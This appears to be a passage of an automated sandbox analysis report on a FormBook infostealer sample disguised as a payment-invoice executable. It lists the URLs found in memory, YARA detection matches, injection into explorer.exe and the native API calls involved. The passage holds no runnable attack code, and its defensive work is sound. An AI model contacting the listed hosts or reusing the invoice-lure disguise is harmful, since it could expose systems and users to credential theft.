Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.zomapa.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.zomapa.com/blr/
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.zomapa.com/blr/www.carbeloy.com
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp	String found in binary or memory: http://www.zomapa.comReferer:
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237111867.0000000000DEB000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

.NET source code contains very large strings

Show sources

Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, LogIn.cs	Long String: Length: 13656
Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.610000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 0.0.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.610000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 4.0.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.4d0000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.4d0000.1.unpack, LogIn.cs	Long String: Length: 13656

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00419D60 NtCreateFile,	4_2_00419D60
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00419E10 NtReadFile,	4_2_00419E10
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00419E90 NtClose,	4_2_00419E90
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00419F40 NtAllocateVirtualMemory,	4_2_00419F40
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00419E8C NtClose,	4_2_00419E8C
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00419F3A NtAllocateVirtualMemory,	4_2_00419F3A
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01029910 NtAdjustPrivilegesToken,LdrInitializeThunk,	4_2_01029910
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010299A0 NtCreateSection,LdrInitializeThunk,	4_2_010299A0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01029840 NtDelayExecution,LdrInitializeThunk,	4_2_01029840
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01029860 NtQuerySystemInformation,LdrInitializeThunk,	4_2_01029860
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010298F0 NtReadVirtualMemory,LdrInitializeThunk,	4_2_010298F0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01029A00 NtProtectVirtualMemory,LdrInitializeThunk,	4_2_01029A00
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01029A20 NtResumeThread,LdrInitializeThunk,	4_2_01029A20
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01029A50 NtCreateFile,LdrInitializeThunk,	4_2_01029A50
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01029540 NtReadFile,LdrInitializeThunk,	4_2_01029540
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010295D0 NtClose,LdrInitializeThunk,	4_2_010295D0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01029710 NtQueryInformationToken,LdrInitializeThunk,	4_2_01029710
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01029780 NtMapViewOfSection,LdrInitializeThunk,	4_2_01029780
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010297A0 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_010297A0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01029660 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_01029660
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010296E0 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_010296E0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01029950 NtQueueApcThread,	4_2_01029950
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010299D0 NtCreateProcessEx,	4_2_010299D0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01029820 NtEnumerateKey,	4_2_01029820
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0102B040 NtSuspendThread,	4_2_0102B040
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010298A0 NtWriteVirtualMemory,	4_2_010298A0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01029B00 NtSetValueKey,	4_2_01029B00
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0102A3B0 NtGetContextThread,	4_2_0102A3B0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01029A10 NtQuerySection,	4_2_01029A10
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01029A80 NtOpenDirectoryObject,	4_2_01029A80
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01029520 NtWaitForSingleObject,	4_2_01029520
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0102AD30 NtSetContextThread,	4_2_0102AD30
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01029560 NtWriteFile,	4_2_01029560
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010295F0 NtQueryInformationFile,	4_2_010295F0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0102A710 NtOpenProcessToken,	4_2_0102A710
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01029730 NtQueryVirtualMemory,	4_2_01029730
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01029760 NtOpenProcess,	4_2_01029760
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01029770 NtSetInformationFile,	4_2_01029770
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0102A770 NtOpenThread,	4_2_0102A770
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01029FE0 NtCreateMutant,	4_2_01029FE0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01029610 NtEnumerateValueKey,	4_2_01029610
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01029650 NtQueryValueKey,	4_2_01029650
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01029670 NtQueryInformationProcess,	4_2_01029670
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010296D0 NtCreateKey,	4_2_010296D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C695D0 NtClose,LdrInitializeThunk,	9_2_04C695D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C69540 NtReadFile,LdrInitializeThunk,	9_2_04C69540
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C696D0 NtCreateKey,LdrInitializeThunk,	9_2_04C696D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C696E0 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_04C696E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C69650 NtQueryValueKey,LdrInitializeThunk,	9_2_04C69650
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C69660 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_04C69660
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C69FE0 NtCreateMutant,LdrInitializeThunk,	9_2_04C69FE0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C69780 NtMapViewOfSection,LdrInitializeThunk,	9_2_04C69780
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C69710 NtQueryInformationToken,LdrInitializeThunk,	9_2_04C69710
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C69840 NtDelayExecution,LdrInitializeThunk,	9_2_04C69840
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C69860 NtQuerySystemInformation,LdrInitializeThunk,	9_2_04C69860
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C699A0 NtCreateSection,LdrInitializeThunk,	9_2_04C699A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C69910 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_04C69910
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C69A50 NtCreateFile,LdrInitializeThunk,	9_2_04C69A50
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C695F0 NtQueryInformationFile,	9_2_04C695F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C69560 NtWriteFile,	9_2_04C69560
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C69520 NtWaitForSingleObject,	9_2_04C69520
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C6AD30 NtSetContextThread,	9_2_04C6AD30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C69670 NtQueryInformationProcess,	9_2_04C69670
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C69610 NtEnumerateValueKey,	9_2_04C69610
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C697A0 NtUnmapViewOfSection,	9_2_04C697A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C69760 NtOpenProcess,	9_2_04C69760
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C6A770 NtOpenThread,	9_2_04C6A770
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C69770 NtSetInformationFile,	9_2_04C69770
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C6A710 NtOpenProcessToken,	9_2_04C6A710
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C69730 NtQueryVirtualMemory,	9_2_04C69730
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C698F0 NtReadVirtualMemory,	9_2_04C698F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C698A0 NtWriteVirtualMemory,	9_2_04C698A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C6B040 NtSuspendThread,	9_2_04C6B040
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C69820 NtEnumerateKey,	9_2_04C69820
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C699D0 NtCreateProcessEx,	9_2_04C699D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C69950 NtQueueApcThread,	9_2_04C69950
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C69A80 NtOpenDirectoryObject,	9_2_04C69A80
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C69A00 NtProtectVirtualMemory,	9_2_04C69A00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C69A10 NtQuerySection,	9_2_04C69A10
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C69A20 NtResumeThread,	9_2_04C69A20
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C6A3B0 NtGetContextThread,	9_2_04C6A3B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C69B00 NtSetValueKey,	9_2_04C69B00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_030A9F40 NtAllocateVirtualMemory,	9_2_030A9F40
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_030A9E10 NtReadFile,	9_2_030A9E10
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_030A9E90 NtClose,	9_2_030A9E90
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_030A9D60 NtCreateFile,	9_2_030A9D60
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_030A9F3A NtAllocateVirtualMemory,	9_2_030A9F3A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_030A9E8C NtClose,	9_2_030A9E8C

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 0_2_028DC2B0	0_2_028DC2B0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 0_2_028D9990	0_2_028D9990
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0040102F	4_2_0040102F
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00401030	4_2_00401030
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0041D146	4_2_0041D146
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0040117A	4_2_0040117A
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0041E229	4_2_0041E229
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0041D4D6	4_2_0041D4D6
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00402D90	4_2_00402D90
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00409E40	4_2_00409E40
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0041D625	4_2_0041D625
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00409E3C	4_2_00409E3C
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0041D73F	4_2_0041D73F
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00402FB0	4_2_00402FB0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01004120	4_2_01004120
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FFB090	4_2_00FFB090
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010A1002	4_2_010A1002
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010120A0	4_2_010120A0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B20A8	4_2_010B20A8
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FEF900	4_2_00FEF900
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B2B28	4_2_010B2B28
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0101EBB0	4_2_0101EBB0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B22AE	4_2_010B22AE
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B2D07	4_2_010B2D07
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B1D55	4_2_010B1D55
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01012581	4_2_01012581
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF841F	4_2_00FF841F
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FFD5E0	4_2_00FFD5E0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE0D20	4_2_00FE0D20
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B1FF1	4_2_010B1FF1
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01006E30	4_2_01006E30
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B2EF7	4_2_010B2EF7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CED466	9_2_04CED466
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C3841F	9_2_04C3841F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF25DD	9_2_04CF25DD
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C3D5E0	9_2_04C3D5E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C52581	9_2_04C52581
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF1D55	9_2_04CF1D55
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF2D07	9_2_04CF2D07
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C20D20	9_2_04C20D20
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF2EF7	9_2_04CF2EF7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CED616	9_2_04CED616
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C46E30	9_2_04C46E30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF1FF1	9_2_04CF1FF1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF28EC	9_2_04CF28EC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C3B090	9_2_04C3B090
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C520A0	9_2_04C520A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF20A8	9_2_04CF20A8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CE1002	9_2_04CE1002
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C2F900	9_2_04C2F900
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C44120	9_2_04C44120
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF22AE	9_2_04CF22AE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CEDBD2	9_2_04CEDBD2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04C5EBB0	9_2_04C5EBB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_04CF2B28	9_2_04CF2B28
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_030AE229	9_2_030AE229
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_030AD146	9_2_030AD146
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_03092FB0	9_2_03092FB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_030AD625	9_2_030AD625
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_03099E3C	9_2_03099E3C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_03099E40	9_2_03099E40
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_03092D90	9_2_03092D90
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_030AD4D6	9_2_030AD4D6

Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 04C2B150 appears 35 times
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: String function: 00FEB150 appears 35 times

Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237111867.0000000000DEB000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.236125503.00000000006C1000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameRegistryTimeZoneInformation.exe6 vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameriched20.dllp( vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp	Binary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAsyncState.dllF vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
